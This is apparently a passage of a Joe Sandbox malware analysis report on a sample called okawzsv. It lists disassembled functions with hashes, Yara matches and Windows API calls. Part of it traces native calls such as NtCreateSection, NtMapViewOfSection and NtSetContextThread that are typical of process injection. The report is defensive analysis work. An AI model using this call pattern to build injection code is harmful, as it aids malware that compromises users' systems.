                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 856254489-711371036
                                                                                                                        • Opcode ID: e0678e921978aa89001a5f604fc50081054cfe1b70a77d93c730e9d1556a5cff
                                                                                                                        • Instruction ID: 003bf2413bdcaddfa9f669a4f07945a4db877d4baaec2d20db0c75a1d14693f4
                                                                                                                        • Opcode Fuzzy Hash: e0678e921978aa89001a5f604fc50081054cfe1b70a77d93c730e9d1556a5cff
                                                                                                                        • Instruction Fuzzy Hash: 3601C43130156566EB24AA59FC42FDB33DC9F10358FC0842BFE04D6691E638DA81829D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer_memmove
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3__fgetc_ungetc
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: std::ios_base::good$char_traits
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __Getcvt.LIBCPMT ref: 0040C62C
                                                                                                                        • MultiByteToWideChar.KERNEL32(0040279A,00000009,?,00000002,00000000,00000000), ref: 0040C67A
                                                                                                                        • MultiByteToWideChar.KERNEL32(0040279A,00000009,00000001,8BFC458B,00000000,00000000), ref: 0040C6F0
                                                                                                                        • MultiByteToWideChar.KERNEL32(0040279A,00000009,00000001,00000001,00000000,00000000), ref: 0040C718
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$Getcvt
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: char_traits
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041C3CE
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 0041C3FC
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0042269E,?,00BFBBEF,00000003), ref: 0041C42A
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0042269E,?,00BFBBEF,00000003), ref: 0041C460
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: fpos$__fseeki64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00410C05
                                                                                                                          • Part of subcall function 0041122D: ___AdjustPointer.LIBCMT ref: 00411276
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00410C1C
                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00410C2E
                                                                                                                        • CallCatchBlock.LIBCMT ref: 00410C52
                                                                                                                        Similarity
                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2633735394-0
                                                                                                                        • Opcode ID: 9f610d4256106c67e77eeb8086814c545808b76a3f9ccbb3b3612bd399037d2a
                                                                                                                        • Instruction ID: 021a644a5705dcc2f30118e794a8131803266c00eb7b550087217aa01a2668e3
                                                                                                                        • Opcode Fuzzy Hash: 9f610d4256106c67e77eeb8086814c545808b76a3f9ccbb3b3612bd399037d2a
                                                                                                                        • Instruction Fuzzy Hash: 17011B32000108BBCF125F55DD41EDB3BB5EF48754F04412AFA1865121D37AE8E1DF94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                        • Instruction ID: 3ad6a21e4fe395c3f16d5f8e27eb2f8b04298450baeff8efe86de5371b2d4043
                                                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                        • Instruction Fuzzy Hash: 51014C7600414EBBCF165E85CC51CEE3F62BB18354F58841AFE5858131D73BD9B2AB89
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ctypestd::ios_base::width
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2977974675-2766056989
                                                                                                                        • Opcode ID: 1dde864a4d1f71821fd79f88777ba04ceea7b7c97a2188b4ed7fa0e0ae202efd
                                                                                                                        • Instruction ID: ffa81e43551186a569dd1938059c660948f4a0953cb923ce35951bddbb60aeed
                                                                                                                        • Opcode Fuzzy Hash: 1dde864a4d1f71821fd79f88777ba04ceea7b7c97a2188b4ed7fa0e0ae202efd
                                                                                                                        • Instruction Fuzzy Hash: EBD13BB59001099FCB04DF98D991EEF7BB5AF88304F14816EF90AB7291D738AE51CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: swprintf
                                                                                                                        • String ID: $$$
                                                                                                                        • API String ID: 233258989-233714265
                                                                                                                        • Opcode ID: 3668303aa29a0dabb202197abf4df9e866dd254b85a5112abaf3c729ecfcf1c2
                                                                                                                        • Instruction ID: bc444b2cf32fdad62ea948e60bd07a60d5c7d67e683fca1e49730543abc2646c
                                                                                                                        • Opcode Fuzzy Hash: 3668303aa29a0dabb202197abf4df9e866dd254b85a5112abaf3c729ecfcf1c2
                                                                                                                        • Instruction Fuzzy Hash: B3715B7190060DDECB05DFA8D9507AFB7B5FF58304F00826EE955B6280DB389992CF99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: swprintf
                                                                                                                        • String ID: $$$
                                                                                                                        • API String ID: 233258989-233714265
                                                                                                                        • Opcode ID: f1704eac4cf36b8a75f20d87a995401e01ce9c4bc705e167662f00f3c097d210
                                                                                                                        • Instruction ID: 35cef4726bb78e6ff1766266f99b827679f0f48cacb583a1577e519e601fc831
                                                                                                                        • Opcode Fuzzy Hash: f1704eac4cf36b8a75f20d87a995401e01ce9c4bc705e167662f00f3c097d210
                                                                                                                        • Instruction Fuzzy Hash: 5C713871D0060DDECB05DFA8D860AAEB7B5FF49304F00816AE915B7291DB388A96CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 004016C5
                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?), ref: 004016E5
                                                                                                                        Strings
                                                                                                                        • Failed to delete file: , xrefs: 00401716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Affinity::operator!=Concurrency::details::DeleteFileHardware
                                                                                                                        • String ID: Failed to delete file:
                                                                                                                        • API String ID: 4164438129-802139604
                                                                                                                        • Opcode ID: d66dcf6a8dc6a3e5bd758008570e7375846c968408ebcd66a45ccf045e2991d6
                                                                                                                        • Instruction ID: 06c7ffe7d5daae15de523941c83ffb82ed17ce66fba7923ca96aaa4245e59707
                                                                                                                        • Opcode Fuzzy Hash: d66dcf6a8dc6a3e5bd758008570e7375846c968408ebcd66a45ccf045e2991d6
                                                                                                                        • Instruction Fuzzy Hash: F311FC71910108ABCB04FBA2DD91DEEB778AF54304B50457EB502B71A1EF386A45CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Maklocchr$Getvals
                                                                                                                        • String ID: `@
                                                                                                                        • API String ID: 658415086-4145069739
                                                                                                                        • Opcode ID: c2d3c5db30b8487bfa4c4aeb23a8321ae3bc7ddcc7242e95170a85a8601fe89d
                                                                                                                        • Instruction ID: 6a1381a069a169ce79d2bee2e0d78584020825acce271e98bcd73c4ae330635a
                                                                                                                        • Opcode Fuzzy Hash: c2d3c5db30b8487bfa4c4aeb23a8321ae3bc7ddcc7242e95170a85a8601fe89d
                                                                                                                        • Instruction Fuzzy Hash: 20F0E275F40244A6D710DB91D801BACB371EF81710F24C12FE9013B3C0E6761611CB69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0041A1EE
                                                                                                                          • Part of subcall function 00410793: __mtinitlocknum.LIBCMT ref: 004107A5
                                                                                                                          • Part of subcall function 00410793: EnterCriticalSection.KERNEL32(?,?,00415478,00000008,0040E28A,0042E380,0000000C,0040E37C,?,?,00401017,00425BD0), ref: 004107BE
                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A1FE
                                                                                                                          • Part of subcall function 00415B03: ___addlocaleref.LIBCMT ref: 00415B1F
                                                                                                                          • Part of subcall function 00415B03: ___removelocaleref.LIBCMT ref: 00415B2A
                                                                                                                          • Part of subcall function 00415B03: ___freetlocinfo.LIBCMT ref: 00415B3E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                        • String ID: H%C
                                                                                                                        • API String ID: 547918592-2263795111
                                                                                                                        • Opcode ID: a9dc2c54fcda5048e922219df0f4b85028d06726240b4d84cc39226bf667a4f2
                                                                                                                        • Instruction ID: a53420b0902ef64b63b1f707c45d0e93894e40e42d14a00336fc843c37c13c6a
                                                                                                                        • Opcode Fuzzy Hash: a9dc2c54fcda5048e922219df0f4b85028d06726240b4d84cc39226bf667a4f2
                                                                                                                        • Instruction Fuzzy Hash: 55E086715C2B20F9D664ABA16E177CDB2505B4073AFB0516FF018551D1CAFC16C0859E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040C359
                                                                                                                          • Part of subcall function 0040F8BA: std::exception::_Copy_str.LIBCMT ref: 0040F8D3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040C36E
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                        • String ID: hB
                                                                                                                        • API String ID: 757275642-4076494561
                                                                                                                        • Opcode ID: 6c758fcc94796d7cdf548d3d4a82f0f196536c2b04cc85ce666a14877834395e
                                                                                                                        • Instruction ID: 0f3a68af293bead6babbb4631738e854e3801d5e08154dd3f376438cbc0ba5bd
                                                                                                                        • Opcode Fuzzy Hash: 6c758fcc94796d7cdf548d3d4a82f0f196536c2b04cc85ce666a14877834395e
                                                                                                                        • Instruction Fuzzy Hash: 26D01775D0020CBBCB00EFA5D4468CDBBB8AA04304B40C037AD14A7640EB38E20C8B88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040C387
                                                                                                                          • Part of subcall function 0040F8BA: std::exception::_Copy_str.LIBCMT ref: 0040F8D3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040C39C
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                        • String ID: ,hB
                                                                                                                        • API String ID: 757275642-4225804165
                                                                                                                        • Opcode ID: 2f855e2fd30610a572568cada886d5fc2d72430644ccf6f9950a5ea43dce41f1
                                                                                                                        • Instruction ID: 9b3e3e6bf7c467838fe5340204e9767982166bef48709d352846509847c21599
                                                                                                                        • Opcode Fuzzy Hash: 2f855e2fd30610a572568cada886d5fc2d72430644ccf6f9950a5ea43dce41f1
                                                                                                                        • Instruction Fuzzy Hash: D2D0427590020CAACB04EEA5E4458DEBBA9AA04344B508476BD15A6641EA78E2488A98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                        Signature Coverage:10.7%
                                                                                                                        Total number of Nodes:410
                                                                                                                        Total number of Limit Nodes:40

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,to@,?,?,?,00000000), ref: 0040AC2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SectionView
                                                                                                                        • String ID: to@$to@
                                                                                                                        • API String ID: 1323581903-3423273117
                                                                                                                        • Opcode ID: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction ID: 88c6af07cecda7dc52f2954e71423d245eb0154dddc4a1c440b087aa91dd83bd
                                                                                                                        • Opcode Fuzzy Hash: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction Fuzzy Hash: 2F714CB1E04258DFCB04CFA9C490AEDBBF2AF8D304F18816AE459B7341D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,1o@,00000000,?,?,08000000), ref: 0040AA01
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateSection
                                                                                                                        • String ID: 1o@
                                                                                                                        • API String ID: 2449625523-1313955917
                                                                                                                        • Opcode ID: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction ID: 28a81098a72d725d87d8893a00b6b3592a645c596d15c3f0b08f8818d347be54
                                                                                                                        • Opcode Fuzzy Hash: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction Fuzzy Hash: 60714CB1E04258DFCB04CFA9C591AEDBBF1AF89304F18806AE459B7381D638A952CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AE61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction ID: c6ec39a31f4d8b50fe65f8e64631f8413f779835fbb3720df3a48058bcedeb27
                                                                                                                        • Opcode Fuzzy Hash: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction Fuzzy Hash: 1C815FB1E04258DFCB04CFA9C490AEDBBF5AF8D304F18816AE459B7341D638A952CF95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B089
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction ID: d6619ef8149ede43c601ef0414cd975a016ba1077e4db4a125d4735272169ad1
                                                                                                                        • Opcode Fuzzy Hash: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction Fuzzy Hash: 947130B1E04158DFCB04CFA9D890AEEBBF5AF4D304F18816AE459B7341D735A941CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph (image not reproduced): function starting at 40b7b3; block 40b8f5-40b91a calls NtAllocateVirtualMemory.
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B90D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction ID: c2bc70c67c96ebf08775754c961f24cd964934424d3d7cdecbfbf4049ab5f95d
                                                                                                                        • Opcode Fuzzy Hash: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction Fuzzy Hash: 5B713CB1E04158DFCB04CFA9D490AEDBBF5AF89304F18806AE459B7351D738A942CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtGetContextThread.NTDLL(?,?), ref: 0040A1AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction ID: 569fe0476a0aaca3de4d5581861cfc3fd9c06305b11eb610b2df8ad8e3e41c8d
                                                                                                                        • Opcode Fuzzy Hash: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction Fuzzy Hash: E97162B1E04258DFCB04CFA9C490AEDBBF1BF89314F1881AAE455BB381D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtSetContextThread.NTDLL(?,?), ref: 0040A3BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 1e982c93f9d650f9dbd291c9a03aa16e87ae41fa8a46d131f8671f23f8a9189f
                                                                                                                        • Instruction ID: b6393094b48186db1cd28faa6a2d1e77d08023efe8f8686be57df15e0784c314
                                                                                                                        • Opcode Fuzzy Hash: 1e982c93f9d650f9dbd291c9a03aa16e87ae41fa8a46d131f8671f23f8a9189f
                                                                                                                        • Instruction Fuzzy Hash: 617160B1E04258DFCB04CFA9D490AEDBBF1BF89304F18806AE855B7341D638A951DF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtDelayExecution.NTDLL(000000CA,?,?,?,00000000), ref: 0040B4DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DelayExecution
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1249177460-0
                                                                                                                        • Opcode ID: 939a7ef11426b680e6e28c661b4955a8a2544a13258ce9ecde5f03bee7dc1711
                                                                                                                        • Instruction ID: 2a0f2d4374a5b1372567ab7d7accfbe094e16785fb5b7fbcc333c631794ade9e
